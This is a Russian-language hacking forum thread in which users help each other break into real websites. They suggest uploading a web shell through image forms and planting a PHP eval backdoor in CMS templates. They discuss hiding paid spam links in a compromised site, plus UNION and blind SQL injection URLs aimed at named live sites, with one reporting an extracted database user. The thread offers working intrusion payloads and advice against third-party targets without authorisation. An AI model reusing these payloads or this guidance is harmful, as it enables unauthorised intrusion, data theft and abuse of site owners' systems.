Ваши вопросы по уязвимостям.

Сказал бы,что за кмс,если это не самопис то из админки известны способы заливки.
Если самопис какой-то,1.)ищи заливку картинок и пробуй загрузить шелл , 2.)Ищи место куда можно вставить пхп код и чтоб он исполнялся,например если в шаблонах разрешен пхп,то вставляешь туда пхп код например eval(stripslashes($_GET[e])); вызываешь пхпинфо,а дальше уже смотришь по ситуации...

 

TrinetCMS, тоесть пробывать заливать скрипты через всевозможные формы загрузки( фотографии, видео и т.д.). Так а не запилят банер? Есть смысл делать это через Sape, просто при анализе это сайта через http://www.cy-pr.com/, говорят что сапа отвалит больше 1000 $ , вот и решил попробовать.
А какой шелл посоветуете, есть какие-нибудь факи по ним?

 

губозакататель еще дадут бесплатный никелированный, если сапа даст больше 1к $, значит сайт с высоким тиц-ем, скорее всего он в сапе уже есть, если нет то за ним следят и спалят появление всяких ссылок очень быстро..

 

Яша 450
Google PageRank (PR) 5
Его нет в сапе, а если умело, может и не запилят?

 

если на сайте нет нормального админа, а только контент-менеджер который дальше админки ничего не знает то можно попробовать скрыть в шаблоне ссылки через display:none, но все же это палево все равно. вдруг завтра как раз решат поставить сапу на сайт а тут хоп - сайт уже в сапе ))

 

Ну посмотрим, а что такое display:none, типо реклама вида Hide, так сапа заблочит за это?!

 

Ладно, такой вопрос, если есть доступ через шел к папке phpmyadmin, а из адресной строки доступа нет(403 Forbidden), как открыть доступ к этой директории?

 

в этой папке или в корне есть .htaccess? может через него доступ закрыт.

 

Понял, поищу, спасибо!

 

Делаю запрос

Выходит такая ошибка:
Warning: array_merge() [function.array-merge]: Argument #2 is not an array

Если делаю так

Отображается страница с записями

если перед 2 минус ставлю

getData: Incorrect table name '' SQL=SELECT DISTINCT `` AS blabla FROM `` LIMIT 0, 10

Какой запрос сформировать?

Интересно что даже если делаю 1,2,3,4 и т.д.

данные отображаются

//обсуждение таких вопросов без указания линков, не эффективно..иногда даже без результата {модер}

 

Что за сайт-то?

 

у меня вопрос
www.truvor.ru/news.php?%20id_new=-91+union+select%20+1,2,3,4,5,6,7,8,9
как вывисти какиенибуть данные если всегда отображается только текст?

 

Смотри в title

http://www.truvor.ru/news.php?id_new=-91+union+select+1,2,3,4,version(),6,7,8,9--

 

Не получается вывести имя юзера.


http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+select+user,null,null,null,null,null,null,null,null,null,null,null+from+sys.dual--

http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+select+sys.login_user,null,null,null,null,null,null,null,null,null,null,null+from+sys.dual--

 

хи алл! народ помогите с Joomla 1.5.9 - сил ужо нет( ,какие у него дыры , хотяб статейку подкинте.
спс)

 

Делаю запрос

Все отлично показывает

А на вот такой

говорит

Как я понял тут фильтруется from или набодобие того как это обойти?

 

а погуглить влом?

 

попробуй указать базу где находится табличка users, если и так не сканает то скорее всего фильтр на from, попробуй подзапросами...

 

Табличку указывал не проканало, а как подзапросы делать можно примерчик?

 

можно попробовать вслепую:

Code:

http://www.oeaw.ac.at/oeaw_servlet/PersonenDetailsGeneric?id=12361+AND+ASCII(SUBSTR((SELECT+SYS.LOGIN_USER+FROM+DUAL),1,1))=87

user:WWW